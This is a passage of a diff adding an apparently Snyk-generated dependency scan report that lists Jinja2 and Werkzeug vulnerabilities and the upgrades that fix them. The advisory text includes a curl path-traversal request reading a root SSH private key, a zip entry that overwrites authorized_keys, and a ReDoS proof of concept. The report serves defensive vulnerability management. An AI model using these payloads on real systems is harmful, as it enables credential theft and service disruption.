+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Cross-site Scripting (XSS)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-PYTHON-JINJA2-6809379</li>
+      <li class="card-meta-item">CWE-79</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> jinja2@2.7.2</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">not-python@0.0.0 &#x203A; jinja2@2.7.2</div>
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show 1 more path</span><span class="toggle-less">Show less</span></summary>
+        <div class="dep-path">not-python@0.0.0 &#x203A; flask@3.0.0 &#x203A; jinja2@2.7.2</div>
+      </details>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://pypi.org/project/Jinja2/" target="_blank" rel="noopener noreferrer">Jinja2</a> is a template engine written in pure Python. It provides a Django inspired non-XML syntax but supports inline expressions and an optional sandboxed environment.</p><p>Affected versions of this package are vulnerable to Cross-site Scripting (XSS) through the <code>xmlattr</code> filter. An attacker can manipulate the output of web pages by injecting additional attributes into elements, potentially leading to unauthorized actions or information disclosure.</p><p><strong>Note:</strong></p><p>This vulnerability derives from an improper fix of <a href="https://security.snyk.io/vuln/SNYK-PYTHON-JINJA2-6150717" target="_blank" rel="noopener noreferrer">CVE-2024-22195</a>, which only addressed spaces but not other characters.</p><h2>Details</h2><p>Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.</p><p>This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML)  in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.</p><p>Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.</p><p>Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, <code>&lt;</code> can be coded as  <code>&amp;lt</code>; and <code>&gt;</code> can be coded as <code>&amp;gt</code>; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses <code>&lt;</code> and <code>&gt;</code> as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.</p><p>The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.</p><h3>Types of attacks</h3><p>There are a few methods by which XSS can be manipulated:</p><table><thead><tr><th>Type</th><th>Origin</th><th>Description</th></tr></thead><tbody><tr><td><strong>Stored</strong></td><td>Server</td><td>The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.</td></tr><tr><td><strong>Reflected</strong></td><td>Server</td><td>The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.</td></tr><tr><td><strong>DOM-based</strong></td><td>Client</td><td>The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.</td></tr><tr><td><strong>Mutated</strong></td><td></td><td>The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.</td></tr></tbody></table><h3>Affected environments</h3><p>The following environments are susceptible to an XSS attack:</p><ul><li>Web servers</li><li>Application servers</li><li>Web application environments</li></ul><h3>How to prevent</h3><p>This section describes the top best practices designed to specifically protect your code:</p><ul><li>Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.</li><li>Convert special characters such as <code>?</code>, <code>&amp;</code>, <code>/</code>, <code>&lt;</code>, <code>&gt;</code> and spaces to their respective HTML or URL encoded equivalents.</li><li>Give users the option to disable client-side scripts.</li><li>Redirect invalid requests.</li><li>Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.</li><li>Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.</li><li>Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.</li></ul><h2>Remediation</h2><p>Upgrade <code>Jinja2</code> to version 3.1.4 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/pallets/jinja/commit/0668239dc6b44ef38e7a6c9f91f312fd4ca581cb" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-PYTHON-JINJA2-6809379" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">98</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Template Injection</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-PYTHON-JINJA2-8548181</li>
+      <li class="card-meta-item">CWE-1336</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> jinja2@2.7.2</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">not-python@0.0.0 &#x203A; jinja2@2.7.2</div>
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show 1 more path</span><span class="toggle-less">Show less</span></summary>
+        <div class="dep-path">not-python@0.0.0 &#x203A; flask@3.0.0 &#x203A; jinja2@2.7.2</div>
+      </details>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p>Affected versions of this package are vulnerable to Template Injection when an attacker controls the content of a template. This is due to an oversight in the sandboxed environment&#39;s method detection when using a stored reference to a malicious string&#39;s <code>format</code> method, which can then be executed through a filter.</p><p><strong>Note:</strong> This is only exploitable through custom filters in an application.</p><h2>Remediation</h2><p>Upgrade <code>jinja2</code> to version 3.1.5 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/pallets/jinja/commit/48b0687e05a5466a91cd5812d604fa37ad0943b4" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://github.com/pallets/jinja/releases/tag/3.1.5" target="_blank" rel="noopener noreferrer">GitHub Release</a></li><li><a href="https://jinja.palletsprojects.com/en/stable/changes/#version-3-1-5" target="_blank" rel="noopener noreferrer">Jinja Chnanges</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-PYTHON-JINJA2-8548181" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">190</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Improper Neutralization</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-PYTHON-JINJA2-8548987</li>
+      <li class="card-meta-item">CWE-150</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> jinja2@2.7.2</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">not-python@0.0.0 &#x203A; jinja2@2.7.2</div>
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show 1 more path</span><span class="toggle-less">Show less</span></summary>
+        <div class="dep-path">not-python@0.0.0 &#x203A; flask@3.0.0 &#x203A; jinja2@2.7.2</div>
+      </details>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p>Affected versions of this package are vulnerable to Improper Neutralization when importing a macro in a template whose filename is also a template. This will result in a <code>SyntaxError: f-string: invalid syntax</code> error message because the filename is not properly escaped, indicating that it is being treated as a format string.</p><p><strong>Note:</strong> This is only exploitable when the attacker controls both the content and filename of a template and the application executes untrusted templates.</p><h2>Remediation</h2><p>Upgrade <code>jinja2</code> to version 3.1.5 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/pallets/jinja/commit/767b23617628419ae3709ccfb02f9602ae9fe51f" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://github.com/pallets/jinja/issues/1792" target="_blank" rel="noopener noreferrer">GitHub Issue</a></li><li><a href="https://github.com/pallets/jinja/pull/1852" target="_blank" rel="noopener noreferrer">GitHub PR</a></li><li><a href="https://github.com/pallets/jinja/releases/tag/3.1.5" target="_blank" rel="noopener noreferrer">GitHub Release</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-PYTHON-JINJA2-8548987" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">190</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Template Injection</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-PYTHON-JINJA2-9292516</li>
+      <li class="card-meta-item">CWE-1336</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> jinja2@2.7.2</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">not-python@0.0.0 &#x203A; jinja2@2.7.2</div>
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show 1 more path</span><span class="toggle-less">Show less</span></summary>
+        <div class="dep-path">not-python@0.0.0 &#x203A; flask@3.0.0 &#x203A; jinja2@2.7.2</div>
+      </details>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://pypi.org/project/Jinja2/" target="_blank" rel="noopener noreferrer">Jinja2</a> is a template engine written in pure Python. It provides a Django inspired non-XML syntax but supports inline expressions and an optional sandboxed environment.</p><p>Affected versions of this package are vulnerable to Template Injection through the <code>|attr</code> filter. An attacker that controls the content of a template can escape the sandbox and execute arbitrary Python code by using the <code>|attr</code> filter to get a reference to a string&#39;s plain format method, bypassing the environment&#39;s attribute lookup.</p><p><strong>Note:</strong></p><p>This is only exploitable if the application executes untrusted templates.</p><h2>Remediation</h2><p>Upgrade <code>Jinja2</code> to version 3.1.6 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/pallets/jinja/commit/90457bbf33b8662926ae65cdde4c4c32e756e403" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-PYTHON-JINJA2-9292516" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">53</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Directory Traversal</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-PYTHON-WERKZEUG-8309091</li>
+      <li class="card-meta-item">CWE-22</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> werkzeug@3.0.1</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">not-python@0.0.0 &#x203A; werkzeug@3.0.1</div>
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show 1 more path</span><span class="toggle-less">Show less</span></summary>
+        <div class="dep-path">not-python@0.0.0 &#x203A; flask@3.0.0 &#x203A; werkzeug@3.0.1</div>
+      </details>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://werkzeug.palletsprojects.com/" target="_blank" rel="noopener noreferrer">Werkzeug</a> is a WSGI web application library.</p><p>Affected versions of this package are vulnerable to Directory Traversal due to a bypass for <code>os.path.isabs()</code>, which allows the improper handling of UNC paths beginning with <code>/</code>, in the <code>safe_join()</code> function. This allows an attacker to read some files on the affected server, if they are stored in an affected path.</p><p><strong>Note:</strong> This is only exploitable on Windows systems using Python versions prior to 3.11.</p><h2>Details</h2><p>A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with &#34;dot-dot-slash (../)&#34; sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.</p><p>Directory Traversal vulnerabilities can be generally divided into two types:</p><ul><li><strong>Information Disclosure</strong>: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.</li></ul><p><code>st</code> is a module for serving static files on web pages, and contains a <a href="https://snyk.io/vuln/npm:st:20140206" target="_blank" rel="noopener noreferrer">vulnerability of this type</a>. In our example, we will serve files from the <code>public</code> route.</p><p>If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.</p><pre><code>curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa
+</code></pre><p><strong>Note</strong> <code>%2e</code> is the URL encoded version of <code>.</code> (dot).</p><ul><li><strong>Writing arbitrary files</strong>: Allows the attacker to create or replace existing files. This type of vulnerability is also known as <code>Zip-Slip</code>.</li></ul><p>One way to achieve this is by using a malicious <code>zip</code> archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.</p><p>The following is an example of a <code>zip</code> archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in <code>/root/.ssh/</code> overwriting the <code>authorized_keys</code> file:</p><pre><code>2018-04-15 22:04:29 .....           19           19  good.txt
+2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys
+</code></pre><h2>Remediation</h2><p>Upgrade <code>Werkzeug</code> to version 3.0.6 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/pallets/werkzeug/commit/2767bcb10a7dd1c297d812cc5e6d11a474c1f092" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-PYTHON-WERKZEUG-8309091" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">61</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Allocation of Resources Without Limits or Throttling</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-PYTHON-WERKZEUG-8309092</li>
+      <li class="card-meta-item">CWE-770</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> werkzeug@3.0.1</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">not-python@0.0.0 &#x203A; werkzeug@3.0.1</div>
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show 1 more path</span><span class="toggle-less">Show less</span></summary>
+        <div class="dep-path">not-python@0.0.0 &#x203A; flask@3.0.0 &#x203A; werkzeug@3.0.1</div>
+      </details>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p>Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in <code>formparser.MultiPartParser()</code>. An attacker can cause the parser to consume more memory than the upload size, in excess of <code>max_form_memory_size</code>, by sending malicious data in a non-file field of a  <code>multipart/form-data</code> request.</p><h2>Remediation</h2><p>Upgrade <code>werkzeug</code> to version 3.0.6 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/pallets/quart/commit/5e78c4169b8eb66b91ead3e62d44721b9e1644ee" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://github.com/pallets/werkzeug/commit/50cfeebcb0727e18cc52ffbeb125f4a66551179b" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://github.com/pallets/werkzeug/releases/tag/3.0.6" target="_blank" rel="noopener noreferrer">GitHub Release</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-PYTHON-WERKZEUG-8309092" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+    </details>
+</section>
+</div>
+<div class="container"><div class="project-summary">
+  <div class="summary-meta">
+    <span class="meta-label">Organization</span><span class="meta-value">My Org</span>
+    <span class="meta-label">Test type</span><span class="meta-value">Software Composition Analysis</span>
+    <span class="meta-label">Project path</span><span class="meta-value">multi-project</span>
+    <span class="meta-label">Project</span><span class="meta-value">python</span>
+    <span class="meta-label">Target file</span><span class="meta-value">python/requirements.txt (7 dependencies)</span>
+  </div>
+  <div class="summary-counts">
+    <span class="summary-label">Open issues: 11</span>
+    <span class="severity-badge severity-badge--zero">0 CRITICAL</span>
+    <span class="severity-badge" style="background:#CE5019">2 HIGH</span>
+    <span class="severity-badge" style="background:#D68000">9 MEDIUM</span>
+    <span class="severity-badge severity-badge--zero">0 LOW</span>
+  </div>
+</div><section class="result-section">
+    <details class="finding-type-section" open>
+      <summary><h2 class="finding-type-header"><svg class="chevron" viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg"><path d="M6 3l5 5-5 5z"/></svg>Open Security Issues (11)</h2></summary>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">171</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Sandbox Bypass</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-PYTHON-JINJA2-455616</li>
+      <li class="card-meta-item">CWE-234</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> jinja2@2.7.2</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">python@0.0.0 &#x203A; jinja2@2.7.2</div>
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show 1 more path</span><span class="toggle-less">Show less</span></summary>
+        <div class="dep-path">python@0.0.0 &#x203A; flask@3.0.0 &#x203A; jinja2@2.7.2</div>
+      </details>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://pypi.org/project/Jinja2/" target="_blank" rel="noopener noreferrer">Jinja2</a> is a template engine written in pure Python. It provides a Django inspired non-XML syntax but supports inline expressions and an optional sandboxed environment.</p><p>Affected versions of this package are vulnerable to Sandbox Bypass. Users were allowed to insert <code>str.format</code> through web templates, leading to an escape from sandbox.</p><h2>Remediation</h2><p>Upgrade <code>Jinja2</code> to version 2.8.1 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/pallets/jinja/commit/9b53045c34e61013dc8f09b7e52a555fa16bed16" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-PYTHON-JINJA2-455616" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">292</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Remote Code Execution (RCE)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-PYTHON-WERKZEUG-6808933</li>
+      <li class="card-meta-item">CWE-94</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> werkzeug@3.0.1</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">python@0.0.0 &#x203A; werkzeug@3.0.1</div>
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show 1 more path</span><span class="toggle-less">Show less</span></summary>
+        <div class="dep-path">python@0.0.0 &#x203A; flask@3.0.0 &#x203A; werkzeug@3.0.1</div>
+      </details>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p>Affected versions of this package are vulnerable to Remote Code Execution (RCE) due to insufficient hostname checks and the use of relative paths to resolve requests. When the debugger is enabled, an attacker can convince a user to enter their own PIN to interact with a domain and subdomain they control, and thereby cause malicious code to be executed.</p><p>The demonstrated attack vector requires a number of conditions that render this attack very difficult to achieve, especially if the victim application is running in the recommended configuration of not having the debugger enabled in production.</p><h2>Remediation</h2><p>Upgrade <code>werkzeug</code> to version 3.0.3 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/pallets/werkzeug/commit/71b69dfb7df3d912e66bab87fbb1f21f83504967" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://github.com/pallets/werkzeug/releases/tag/3.0.3" target="_blank" rel="noopener noreferrer">GitHub Release</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-PYTHON-WERKZEUG-6808933" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">84</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Regular Expression Denial of Service (ReDoS)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-PYTHON-JINJA2-1012994</li>
+      <li class="card-meta-item">CWE-400</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> jinja2@2.7.2</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">python@0.0.0 &#x203A; jinja2@2.7.2</div>
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show 1 more path</span><span class="toggle-less">Show less</span></summary>
+        <div class="dep-path">python@0.0.0 &#x203A; flask@3.0.0 &#x203A; jinja2@2.7.2</div>
+      </details>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://pypi.org/project/Jinja2/" target="_blank" rel="noopener noreferrer">Jinja2</a> is a template engine written in pure Python. It provides a Django inspired non-XML syntax but supports inline expressions and an optional sandboxed environment.</p><p>Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The ReDoS vulnerability is mainly due to the <code>_punctuation_re regex</code> operator and its use of multiple wildcards. The last wildcard is the most exploitable as it searches for trailing punctuation.</p><p>This issue can be mitigated by using Markdown to format user content instead of the urlize filter, or by implementing request timeouts or limiting process memory.</p><h3>PoC by Yeting Li</h3><pre><code>from jinja2.utils import urlize
+from time import perf_counter
+
+for i in range(3):
+    text = &#34;abc@&#34; + &#34;.&#34; * (i+1)*5000 + &#34;!&#34;
+    LEN = len(text)
+    BEGIN = perf_counter()
+    urlize(text)
+    DURATION = perf_counter() - BEGIN
+    print(f&#34;{LEN}: took {DURATION} seconds!&#34;)
+</code></pre><h2>Details</h2><p>Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.</p><p>The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren&#39;t very intuitive and can ultimately end up making it easy for attackers to take your site down.</p><p>Let’s take the following regular expression as an example:</p><pre><code>regex = /A(B|C+)+D/
+</code></pre><p>This regular expression accomplishes the following:</p><ul><li><code>A</code> The string must start with the letter &#39;A&#39;</li><li><code>(B|C+)+</code> The string must then follow the letter A with either the letter &#39;B&#39; or some number of occurrences of the letter &#39;C&#39; (the <code>+</code> matches one or more times). The <code>+</code> at the end of this section states that we can look for one or more matches of this section.</li><li><code>D</code> Finally, we ensure this section of the string ends with a &#39;D&#39;</li></ul><p>The expression would match inputs such as <code>ABBD</code>, <code>ABCCCCD</code>, <code>ABCBCCCD</code> and <code>ACCCCCD</code></p><p>It most cases, it doesn&#39;t take very long for a regex engine to find a match:</p><pre><code>$ time node -e &#39;/A(B|C+)+D/.test(&#34;ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD&#34;)&#39;
+0.04s user 0.01s system 95% cpu 0.052 total
+
+$ time node -e &#39;/A(B|C+)+D/.test(&#34;ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX&#34;)&#39;
+1.79s user 0.02s system 99% cpu 1.812 total
+</code></pre><p>The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.</p><p>Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.</p><p>Let&#39;s look at how our expression runs into this problem, using a shorter string: &#34;ACCCX&#34;. While it seems fairly straightforward, there are still four different ways that the engine could match those three C&#39;s:</p><ol><li>CCC</li><li>CC+C</li><li>C+CC</li><li>C+C+C.</li></ol><p>The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use <a href="https://regex101.com/debugger" target="_blank" rel="noopener noreferrer">RegEx 101 debugger</a> to see the engine has to take a total of 38 steps before it can determine the string doesn&#39;t match.</p><p>From there, the number of steps the engine must use to validate a string just continues to grow.</p><table><thead><tr><th>String</th><th>Number of C&#39;s</th><th>Number of steps</th></tr></thead><tbody><tr><td>ACCCX</td><td>3</td><td>38</td></tr><tr><td>ACCCCX</td><td>4</td><td>71</td></tr><tr><td>ACCCCCX</td><td>5</td><td>136</td></tr><tr><td>ACCCCCCCCCCCCCCX</td><td>14</td><td>65,553</td></tr></tbody></table><p>By the time the string includes 14 C&#39;s, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.</p><h2>Remediation</h2><p>Upgrade <code>Jinja2</code> to version 2.11.3 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/pallets/jinja/blob/ab81fd9c277900c85da0c322a2ff9d68a235b2e6/src/jinja2/utils.py#L20" target="_blank" rel="noopener noreferrer">GitHub Additional Information</a></li><li><a href="https://github.com/pallets/jinja/pull/1343" target="_blank" rel="noopener noreferrer">GitHub PR</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-PYTHON-JINJA2-1012994" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">154</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Sandbox Escape</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-PYTHON-JINJA2-174126</li>
+      <li class="card-meta-item">CWE-265</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> jinja2@2.7.2</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">python@0.0.0 &#x203A; jinja2@2.7.2</div>
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show 1 more path</span><span class="toggle-less">Show less</span></summary>
+        <div class="dep-path">python@0.0.0 &#x203A; flask@3.0.0 &#x203A; jinja2@2.7.2</div>
+      </details>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://pypi.org/project/Jinja2/" target="_blank" rel="noopener noreferrer">Jinja2</a> is a template engine written in pure Python. It provides a Django inspired non-XML syntax but supports inline expressions and an optional sandboxed environment.</p><p>Affected versions of this package are vulnerable to Sandbox Escape via the <code>str.format_map</code>. This vulnerability requires the attacker to have information about sensitive attributes, and exploiting it could allow the attacker to access sensitive content.</p><h2>Workaround</h2><p>Override the <code>is_safe_attribute</code> method on the sandbox and explicitly disallow the <code>format_map</code> method on string objects.</p><h2>Remediation</h2><p>Upgrade <code>Jinja2</code> to version 2.10.1 or higher.</p><h2>References</h2><ul><li><a href="https://palletsprojects.com/blog/jinja-2-10-1-released" target="_blank" rel="noopener noreferrer">Release Notes</a></li></ul></div>
+    </div>
